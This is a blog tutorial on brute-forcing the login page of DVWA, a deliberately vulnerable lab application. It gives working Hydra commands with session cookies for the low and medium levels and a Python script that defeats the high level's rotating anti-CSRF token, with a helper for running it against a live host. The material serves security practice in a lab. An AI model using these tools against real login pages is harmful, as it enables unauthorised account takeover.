So you installed Damn Vulnerable Web Application, now what do you do? Join me as I go through learning how brute force works with DVWA using Hydra and Python. DVWA (Damn Vulnerable Web Application) is a deliberately vulnerable PHP/MySQL web application we can use to practise the common web vulnerabilities that show up in CTF challenges.
What is Brute Force
Simply put, you keep submitting usernames and passwords until you hit the right combination. It is worth doing some investigation first to see whether a valid username can be found, which cuts the search space in half. For example, a little research on the web will show the default users for some software: it is well known that the default user for DVWA is "admin", so I don't need to guess usernames at all.
Set-up
System
In my previous post I discussed how to set up DVWA inside Docker on my BlackArch system. You should have a running DVWA environment before attempting any of the below. The addresses used throughout this post are:
| Value | Meaning |
|---|---|
| 192.168.1.163 | Docker host running DVWA |
| 8082 | Port on which DVWA is running |
| 192.168.1.150 | Windows PC where I am running WSL and Firefox |
Authentication
Most of the commands we will use here hit pages that DVWA only serves to a logged-in session, so we need to authenticate before any of them will work. Rather than scripting the login, we can reuse the PHP session ID the browser already holds.
Getting PHP Session ID
To get a session ID we will use Firefox, but Chrome and Edge have the same features. The first step is to open the home page of DVWA and log in. The default login is user: admin and password: password.
Once logged in you need to set the DVWA Security to low. This is done after login by clicking on the DVWA Security tab, setting the Security Level to low and clicking "Submit".
Inside Firefox let's open the inspect tool. You can do this by right-clicking the page and selecting "Inspect", or with the keyboard shortcut, which on Windows is "ctrl + shift + c". Once it is open go to the Storage tab and under "Cookies" select the PHPSESSID cookie. The cookie value will appear on the right side of the screen; right-click it and copy it.
In my case the value is PHPSESSID=hjqhvo1e4i14bo6hbh9ndqc7h2. Whatever your value is, keep it somewhere safe as you will need it when doing some enumeration later on. Note that it is tied to your browser login: if you log out or the session expires you will need to copy a new one.
We can also see another cookie here called "security" with the value "low". The PHPSESSID cookie is what authenticates us; the security cookie tells DVWA which security level to apply to the page, so we need to send both, and change the security value when we move between levels.
Testing Authentication
Now that you have the PHP session ID it is simple to check that it works.
First, without any authentication cookies:
curl http://192.168.1.163:8082/vulnerabilities/brute/
Nothing is returned. Without a valid session DVWA redirects us to the login page, and curl does not follow redirects by default, so the body is empty (add -i to see the redirect status). Let's now try it using our PHP session cookie and security level:
curl http://192.168.1.163:8082/vulnerabilities/brute/ \
-H "Cookie: security=low;PHPSESSID=hjqhvo1e4i14bo6hbh9ndqc7h2" \
-s | head
We pipe the output into head because a lot of HTML is returned and we only want to see the top few lines.
We have now confirmed that our authentication works and can proceed with testing the exploits.
DVWA Brute Force
Security Levels
Like the rest of the DVWA challenges, the brute force one comes with four security levels. The first two are straightforward and the third one is a big step up.
- Low, a very straightforward brute force attack.
- Medium, very similar to the previous one, just slower.
- High, very different from the previous two and requires a different approach.
- Impossible, what it says.
Beating Low Security
The first DVWA vulnerability we will look at is the brute force one. It is pretty straightforward: we need to supply a username and password repeatedly until we find the right one. The tool we are going to use here is Hydra. I have another blog post covering the basics of Hydra which you should take a look at if you are unfamiliar with it.
hydra -l admin \
-P /opt/fasttrack.txt 192.168.1.163 \
-s 8082 http-get-form "/vulnerabilities/brute/\
:username=^USER^&password=^PASS^&Login=Login\
:S=Welcome\
:H=Cookie\: security=low;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4"
Let's break down this command. Note that the PHPSESSID shown here came from a different browser session than the one earlier in the post; always substitute your own current value.
- -l admin, the single username to try. Hydra can also take a file with a list of users with the "-L" flag, but in this case we already know there is a user called "admin".
- -P /opt/fasttrack.txt, the file containing the list of passwords Hydra will try against the user.
- 192.168.1.163, the IP address of the DVWA host.
- -s 8082, the port DVWA is running on.
- http-get-form, the Hydra module for a login form submitted with GET. The quoted string that follows is the form specification, with its fields separated by colons: the path, then the query string with ^USER^ and ^PASS^ as placeholders Hydra fills in on each attempt.
- :S=Welcome, the success condition. On a successful login the word "Welcome" appears somewhere in the response, so Hydra greps each response for it. :F is the alternative, matching on text that appears only on a failed login.
- :H, an extra header to send with every request; here we provide the authentication cookies we got earlier. The colon after "Cookie" is escaped with a backslash so Hydra does not treat it as a field separator.
And we have the password. As I go through this blog post more user names will be revealed and you can use the same process to get the passwords for them. Give it a try.
Before moving on, set the DVWA security level to medium in the browser, and change the cookie in the Hydra command to security=medium so the request is handled at the level you are testing.
Beating Medium Security
For the medium security setting the attack is the same as for low. The main difference is that the server adds a delay after each failed attempt to slow the brute force down, so the same Hydra command works but takes much longer to run. Patience is the key.
Beating High Security Level
This is a much more complicated affair than the previous two security levels, and I may even have over-complicated my solution.
If you run the previous Hydra command against this level you will notice that it does not work. It takes a bit of digging with Burp Suite before you find what the issue is.
It turns out you need to supply a unique user token with each login attempt. Where do you get this token? If you look at the HTML of the login form you can find it as a hidden input field, and a fresh value is issued with every response.
So a PHP session ID, the current user token, a username and a password are all needed for a single login attempt, and the token must be re-read after each try. Good as it is, Hydra's form module cannot refresh a per-request token, so it is not the way forward with this one.
A Python Script is the best way with dealing with this. I created one and also created a youtube video to go along with it.
Take a look at my github page for the script. The script will work on all security levels.
Basically the script takes a text file full of passwords, turns it into a list, and creates a "requests" session. It first grabs the user token from the page, then tries a username, password and user_token combination, reads the new token from the response, and repeats until it finds a combination that works.
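The loop described above, as an added example of my own that is not the author's script or DVWA's code: it reads the hidden user_token from each response, submits it with the next attempt, and stops on the first response containing "Welcome", the same success marker the Hydra command uses. With use_token=False the same loop is the low and medium attack. It assumes the form is submitted with GET and that the hidden field is named user_token; the FakeDVWA class and the wordlist are constructed stand-ins so it runs offline, and make_requests_fetch is the hypothetical piece you would point at a live DVWA.

```python
"""Token-aware brute force of the DVWA brute-force page (added example).

Assumptions, not taken from the original post: the login form is submitted
with GET, the hidden field is named ``user_token``, and success is detected
by the word ``Welcome`` in the response (as in the post's Hydra command).
"""
import re
import secrets
from typing import Callable, Dict, Iterable, Optional, Tuple

# Shape of the "fetch one page" step: (query params, cookies) -> (status, html)
Fetch = Callable[[Dict[str, str], Dict[str, str]], Tuple[int, str]]

TOKEN_RE = re.compile(r"""name=['"]user_token['"]\s+value=['"]([0-9A-Za-z]+)['"]""")


def extract_user_token(html: str) -> Optional[str]:
    """Return the hidden user_token value from the login form, or None."""
    match = TOKEN_RE.search(html)
    return match.group(1) if match else None


def brute_force(fetch: Fetch, username: str, passwords: Iterable[str],
                cookies: Dict[str, str], success_marker: str = "Welcome",
                use_token: bool = True) -> Tuple[Optional[str], int]:
    """Try each password for ``username``; return (password_or_None, attempts).

    With ``use_token`` set, each attempt sends the token read from the previous
    response, which is what the high level demands. Low and medium have no
    token, so pass use_token=False there.
    """
    attempts = 0
    status, html = fetch({}, cookies)          # first GET: proves the session, yields token
    if status != 200:
        raise RuntimeError(f"not logged in: HTTP {status}; check PHPSESSID")
    token = extract_user_token(html)
    for password in passwords:
        params = {"username": username, "password": password, "Login": "Login"}
        if use_token:
            if token is None:
                raise RuntimeError("page carries no user_token but use_token=True")
            params["user_token"] = token
        status, html = fetch(params, cookies)
        attempts += 1
        if success_marker in html:
            return password, attempts
        token = extract_user_token(html)      # every response carries the next token
    return None, attempts


def make_requests_fetch(base_url: str) -> Fetch:
    """Hypothetical fetcher for a live DVWA; needs the ``requests`` package."""
    import requests  # imported here so the offline demo has no extra dependency
    session = requests.Session()

    def fetch(params: Dict[str, str], cookies: Dict[str, str]) -> Tuple[int, str]:
        resp = session.get(base_url, params=params, cookies=cookies,
                           allow_redirects=False, timeout=10)
        return resp.status_code, resp.text
    return fetch


class FakeDVWA:
    """Constructed in-memory stand-in for the DVWA page so the loop runs offline.

    Mimics what the post describes: no valid PHPSESSID means a redirect, a
    high-level attempt must carry the current token, success prints Welcome.
    """
    SESSION = "hjqhvo1e4i14bo6hbh9ndqc7h2"   # session value from the post, treated as valid

    def __init__(self, username: str, password: str, level: str = "high"):
        self._creds = (username, password)
        self._level = level
        self._token = secrets.token_hex(16)

    def fetch(self, params: Dict[str, str], cookies: Dict[str, str]) -> Tuple[int, str]:
        if cookies.get("PHPSESSID") != self.SESSION:
            return 302, ""                    # bounced to login.php, empty body
        body = ""
        if "Login" in params:
            if self._level == "high" and params.get("user_token") != self._token:
                body += "<pre>CSRF token is incorrect</pre>"
            elif (params.get("username"), params.get("password")) == self._creds:
                body += "<p>Welcome to the password protected area admin</p>"
            else:
                body += "<pre><br />Username and/or password incorrect.</pre>"
        self._token = secrets.token_hex(16)   # rotate the token on every response
        body += f"<input type='hidden' name='user_token' value='{self._token}' />"
        return 200, body


def demo() -> Tuple[Optional[str], int]:
    wordlist = ["123456", "letmein", "qwerty", "password", "admin"]  # constructed list
    site = FakeDVWA("admin", "password", level="high")
    cookies = {"security": "high", "PHPSESSID": FakeDVWA.SESSION}
    return brute_force(site.fetch, "admin", wordlist, cookies)


if __name__ == "__main__":
    print(demo())   # → ('password', 4)
```

To run it against a real instance, replace site.fetch with make_requests_fetch("http://192.168.1.163:8082/vulnerabilities/brute/") and your own PHPSESSID; the loop only ever holds one token at a time, which is exactly the state Hydra's form module cannot keep between attempts.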
Wrap Up
The addition of the token adds a layer of complexity that we have not encountered before, and getting past it requires some Python that I just can't cover fully in this post.